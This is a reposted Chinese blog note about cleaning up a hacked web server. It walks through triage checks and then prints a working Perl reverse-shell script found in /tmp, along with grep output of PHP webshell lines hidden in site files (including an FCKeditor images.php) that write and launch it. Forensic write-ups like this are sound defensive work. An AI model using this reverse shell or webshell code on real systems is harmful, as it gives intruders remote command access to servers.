Web服务器捉虫速记
生活随笔
收集整理的這篇文章主要介紹了
Web服务器捉虫速记
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
一服務器疑似被掛馬,現象是從百度搜該站點,出來的結果大部分為色情網站。?
馬上登錄服務器(半夜好困啊)。執行如下的步驟: <!--[if !supportLists]-->1、?<!--[endif]-->檢查系統帳號,看有沒有異常帳號--如冒充系統帳號,改一個字母,看起來像系統帳號,混淆視聽。有的家伙狡猾的干活,創建個帳號為“…”極端不易察覺。 <!--[if !supportLists]-->2、?<!--[endif]-->檢查最近登錄用戶的ip:last 查看9月9號以后到目前的情況,經確認,有一個ip來路不對。 <!--[if !supportLists]-->3、?<!--[endif]-->檢查系統初始化文件inittab,運行級別為3,為發現異常。一些hacker喜歡在這里下手,加上respawn這樣的行,保證他的程序被殺后自動重啟,不屈不撓地抗爭系統管理員的絞殺。 <!--[if !supportLists]-->4、?<!--[endif]-->檢查運行級別目錄的腳本,ls –al /etc/rc3.d ,未見異常。 <!--[if !supportLists]-->5、?<!--[endif]-->檢查自動任務 crontab –l ,root用戶和web運行用戶www各檢查一遍,未見任何異常。 <!--[if !supportLists]-->6、?<!--[endif]-->檢查歷史記錄history 發現有安裝sendmail的情形,問客戶是否有這個,答:不是自己裝的。 <!--[if !supportLists]-->7、?<!--[endif]-->檢查web目錄,發現其權限為777,這可讓人不太放心了,心中猜想,可能是從這里下手了。 <!--[if !supportLists]-->8、?<!--[endif]-->檢查一下目錄/tmp,發現有個文件不太對勁,文件名是spider_bc,打開看一下,是個perl腳本,其內容為:
| [root@localhost mysql]# more?/tmp/spider_bc #!/usr/bin/perl use Socket; $cmd= "lynx"; $system= 'echo "`uname -a`";echo"`id`";/bin/sh'; $0=$cmd; $target=$ARGV[0]; $port=$ARGV[1]; $iaddr=inet_aton($target) || die("Error: $!\n"); $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n"); $proto=getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); system($system); close(STDIN); close(STDOUT); close(STDERR); |
| [root@localhost www]# grep spider_bc * -r /plusbak/viev.php:echo File_Write('/tmp/spider_bc',base64_decode($back_connect_pl),'wb') ? '創建/tmp/spider_bc成功<br>' : '創建/tmp/spider_bc失敗<br>'; /plusbak/viev.php:echo Exec_Run($perlpath.' /tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '執行命令失敗'; /plusbak/viev.php:echo File_Write('/tmp/spider_bc.c',base64_decode($back_connect_c),'wb') ? '創建/tmp/spider_bc.c成功<br>' : '創建/tmp/spider_bc.c失敗<br>'; /plusbak/viev.php:@unlink('/tmp/spider_bc.c'); /plusbak/viev.php:echo Exec_Run('/tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '執行命令失敗'; /developers/FCKeditor/editor/skins/images/images.php:echo File_Write('/tmp/spider_bc',base64_decode($back_connect_pl),'wb') ? '創建/tmp/spider_bc成功<br>' : '創建/tmp/spider_bc失敗<br>'; /developers/FCKeditor/editor/skins/images/images.php:echo Exec_Run($perlpath.' /tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '執行命令失敗'; /developers/FCKeditor/editor/skins/images/images.php:echo File_Write('/tmp/spider_bc.c',base64_decode($back_connect_c),'wb') ? '創建/tmp/spider_bc.c成功<br>' : '創建/tmp/spider_bc.c失敗<br>'; /developers/FCKeditor/editor/skins/images/images.php:@unlink('/tmp/spider_bc.c'); /developers/FCKeditor/editor/skins/images/images.php:echo Exec_Run('/tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '執行命令失敗'; /developers/developers/cache/default/index_sql.php :echo File_Write('/tmp/spider_bc',base64_decode($back_connect_pl),'wb') ? '創建/tmp/spider_bc成功<br>' : '創建/tmp/spider_bc失敗<br>'; /developers/developers/cache/default/index_sql.php :echo Exec_Run($perlpath.' /tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '執行命令失敗'; /developers/developers/cache/default/index_sql.php :echo File_Write('/tmp/spider_bc.c',base64_decode($back_connect_c),'wb') ? '創建/tmp/spider_bc.c成功<br>' : '創建/tmp/spider_bc.c失敗<br>'; /developers/developers/cache/default/index_sql.php :@unlink('/tmp/spider_bc.c'); /developers/developers/cache/default/index_sql.php :echo Exec_Run('/tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '執行命令失敗'; |
總結
以上是生活随笔為你收集整理的Web服务器捉虫速记的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 做梦梦到狗叫是什么意思的
- 下一篇: 如何使用struts2对集合参数进行验证